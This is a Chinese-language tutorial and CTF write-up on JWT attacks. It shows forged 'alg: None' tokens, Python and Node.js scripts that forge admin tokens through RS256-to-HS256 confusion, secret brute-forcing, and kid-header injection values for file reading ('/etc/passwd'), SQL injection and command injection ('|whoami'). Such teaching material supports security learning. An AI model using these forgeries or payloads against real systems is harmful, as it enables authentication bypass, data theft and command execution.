Json Web Token(jwt)攻击方法
0x01:JWT基础
1. 简介
JWT的全称是Json Web Token,遵循JSON格式,跨域认证解决方案,声明被存储在客户端,而不是在服务器内存中,服务器不保留任何用户信息,只保留密钥信息,通过使用特定加密算法验证token,通过token验证用户身份,基于token的身份验证可以替代传统的cookie+session身份验证方法。
2. 组成
header+payload+signature
header
heade部分最常见的两个字段是alg和type,alg指定了token加密使用的算法(最常用的HMAC和RSA算法)。type类型为JWT。
{
"typ":"JWT",
"alg":"HS256"
}
3. payload
payload则为用户数据,如一次登录的过程可能会传递一下数据
{
"user_role" : "finn", //当前登录用户
"iss": "admin", //该JWT的签发者,有些是URL
"iat": 1573440582, //签发时间
"exp": 1573940267, //过期时间
"nbf": 1573440582, //该时间之前不接收处理该Token
"domain": "example.com", //面向的用户
"jti": "dff4214121e83057655e10bd9751d657" //Token唯一标识
}
4. signature
这一部分的功能是保护token完整性,生成方式是将header和payload两个部分链接,然后通过Header部分指定的算法,计算签名。计算公式如下
signature = HMAC-SHA256(base64urlEncode(header) + '.' + base64urlEncode(payload), secret_key
header和payload部分的编码方式为base64urlencode,base64url编码是不会再末尾填充"="号,并且将"+"替换成"-"、"/"替换成"_"
0x02:JWT安全问题
1. 空加密算法
JWT支持空加密算法,可以在header中指定alg为None,这样的话,只要把signature设置为空,即不添加singature字段,提交到服务器,任何token都可以通过服务器的验证,如下:
{
"alg" : "None",
"typ" : "jwt"
}
{
"user" : "Admin"
}
生成的jwt为
ewogICAgImFsZyIgOiAiTm9uZSIsCiAgICAidHlwIiA6ICJqd3QiCn0.ewogICAgInVzZXIiOiJBZG1pbiIKfQ
(header+"."+payload+".",去掉了’.’+signature字段)
空加密算法本身是为了调试方便,在生产环境中开启空加密模式,缺少签名保护,攻击者只要把alg字段设置成none,就可以在payload中构造身份,伪造用户身份。
1.1 CTFshow Web入门 Web345题
拿到jwt的加密字符,解码可以看到每一段后面都会有随机的字符,需要在每一段的后面加=号,数据才能完全正确显示出来。因为header和payload部分的编码方式为base64urlencode,base64url编码是不会再末尾填充"="号,并且将"+"替换成"-"、"/"替换成"_"
可以注意到他只有两段,并且alg的值为None。说明加密算法为空。我们在数据完全正确显示的基础上,将sub的值改成admin。然后进行base64编码
eyJhbGciOiJOb25lIiwidHlwIjoiand0In0uW3siaXNzIjoiYWRtaW4iLCJpYXQiOjE2NDA5MjA2NjUsImV4cCI6MTY0MDkyNzg2NSwibmJmIjoxNjQwOTIwNjY1LCJzdWIiOiJhZG1pbiIsImp0aSI6ImIyZjIxNDlhYmM0M2M1MDJhNTBlYjgwNmMxMmY3YjY1In1d
1.2 CTFhub
修改字段值,然后jwt编码,编码脚本
import base64
def jwtBase64Encode(x):
return base64.b64encode(x.encode('utf-8')).decode().replace('+', '-').replace('/', '_').replace('=', '')
header = input("[*] 输入header部分的明文,放一行:")
payload = input("[*] 输入payload部分的明文,放一行:")
print(jwtBase64Encode(header)+'.'+jwtBase64Encode(payload)+'.')
得到flag,第二段后面的.不能少
1.3 CTFshow Web入门 Web346题
修改字段值,然后编码,脚本如下
import base64
def jwtBase64Encode(x):
return base64.b64encode(x.encode('utf-8')).decode().replace('+', '-').replace('/', '_').replace('=', '')
header = input("[*] 输入header部分的明文,放一行:")
payload = input("[*] 输入payload部分的明文,放一行:")
print(jwtBase64Encode(header)+'.'+jwtBase64Encode(payload)+'.')
2. RSA改成HMAC
JWT中最常用的两种算法为HMAC和RSA
HMAC是一种对称加密算法,使用相同的密钥进行加解密。
RSA是一种非对称加密算法,使用私钥加密,公钥解密。
在HMAC和RSA中,都使用私钥对signature字段进行签名,只有拿到了加密时使用的私钥,才有可能伪造token。
密钥一般情况下是无法获取到的,但是如果可以获取到公钥,我们可以将加密算法RSA改成HMAC,即将alg字段由RS256改成HS256,同时使用获取到的公钥作为算法的密钥,对token进行签名提交给服务器端。服务器会将RSA的公钥作为当前算法(HMAC)的密钥,HMAC公钥和密钥相同,使用HS256算法对接收到的签名进行验证。
2.1 CTFhub 修改签名算法
利用脚本:
import jwt
import base64
public ="""-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtjqDrHGpQVXtYuaIdiqp
8ot4chpzxrthR/OyB2U6t6iFrQBgBaGa65wm7m1Yp9ofygVohowSjdU1HYU5zpLE
LpTwOPeZsMQ9rOVgd/ND6vw+tv/EK0k7jovpu6OWf5F8f1/R8m4KesLJxaLoXfzM
JBPn5gNQTaU0s59fQxMVdl7cyOx9WXnm+bK/dyt6DFtInQznfDhJlQI8Ofym3EuS
DXrD7qggbmHP2CLtErW+lFl63kx4VwxbDuxosPI3g5CFEELNhfhtM9UUcG2Pq/7G
29bUrBelQPPEUEV5w7kcgU7H50F26TJ5vgJZ/K7h5xoHSG5pMvAAQag3UMqqblh2
pQIDAQAB
-----END PUBLIC KEY-----
"""
payload={ "username": "admin","role": "admin"}
print(jwt.encode(payload, key=public, algorithm='HS256'))
这里我用的轻量级服务器跑的,出现的报错问题可以参考https://codeantenna.com/a/r9mHkq9dXb
2.2 CTFshow Web入门 web349
访问/private.key和/public.key拿到公钥和私钥
然后直接生成jwt
# 已知私钥然后自己重新生成 jwt 字符串
import jwt
public = open('private.key', 'r').read()
#print(public)
payload={"user":"admin"}
print(jwt.encode(payload, key=public, algorithm='RS256'))
改成http post,直接发包
2.3 CTFshow Web入门 web350
const jwt = require('jsonwebtoken');
var fs = require('fs');
var privateKey = fs.readFileSync('public.key');
var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'HS256' });
console.log(token)
node.js写的脚本,获取到payload。
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4iLCJpYXQiOjE2MTA3ODI3MDV9.6K4MH3aChKyeyIFtDCWRBO33P8QgrB7wPeOUjF-URGg
改成POST请求方法。
3. 密钥爆破
密钥爆破的基础
1、知道jwt使用的加密算法
2、一段有效的、已签名的token
3、签名用的密钥不复杂(弱密钥)
爆破方法
借助c-jwt-cracker项目:https://github.com/brendan-rius/c-jwt-cracker
使用方法:
docker build . -t jwtcrack
docker run -it --rm jwtcrack 要爆破的otken
然后使用jwt.io网站进行编码
3.1 CTFshow Web入门 web347-348
爆破即可
然后修改数据重放数据即可。
4. 修改KID参数
Kid是header里面的一个参数,该参数用户可控,一般用于指定加密算法的密钥
{
"alg" : "HS256",
"typ" : "jwt",
"kid" : "/home/jwt/.ssh/pem"
}
4.1 任意文件读取
kid参数用于读取密钥文件,如果没有对参数过滤,可以读取其他文件
{
"alg" : "HS256",
"typ" : "jwt",
"kid" : "/etc/passwd"
}
4.2 SQL注入
kid也可以从数据库中提取数据,通过构造SQL语句来获取数据或者是绕过signature的验证。
{
"alg" : "HS256",
"typ" : "jwt",
"kid" : "key11111111' || union select 'secretkey' -- "
}
4.3 命令执行
对kid
参数过滤不严也可能会出现命令注入问题,但是利用条件比较苛刻。如果服务器后端使用的是Ruby,在读取密钥文件时使用了open
函数,通过构造参数就可能造成命令注入。
"/path/to/key_file|whoami"
对于其他的语言,例如php,如果代码中使用的是exec
或者是system
来读取密钥文件,那么同样也可以造成命令注入,当然这个可能性就比较小了。
4.4 信息泄露
JWT保证的是数据传输过程中的完整性而不是机密性。
如果在payload中携带了敏感信息(如存放密钥对的文件路径),单独对payload部分进行base64url
解码,就可以读取到payload中携带的信息。
5. 修改JKU/X5U
JKU用于指定一组用于验证令牌的密钥的URL,类似kid,也可以由用户指定输入数据,用户可以指定一组自定义的密钥文件,并指定Web应用使用改组密钥来验证token
X5U则以URL的形式允许攻击者指定验证令牌的公钥证书和证书链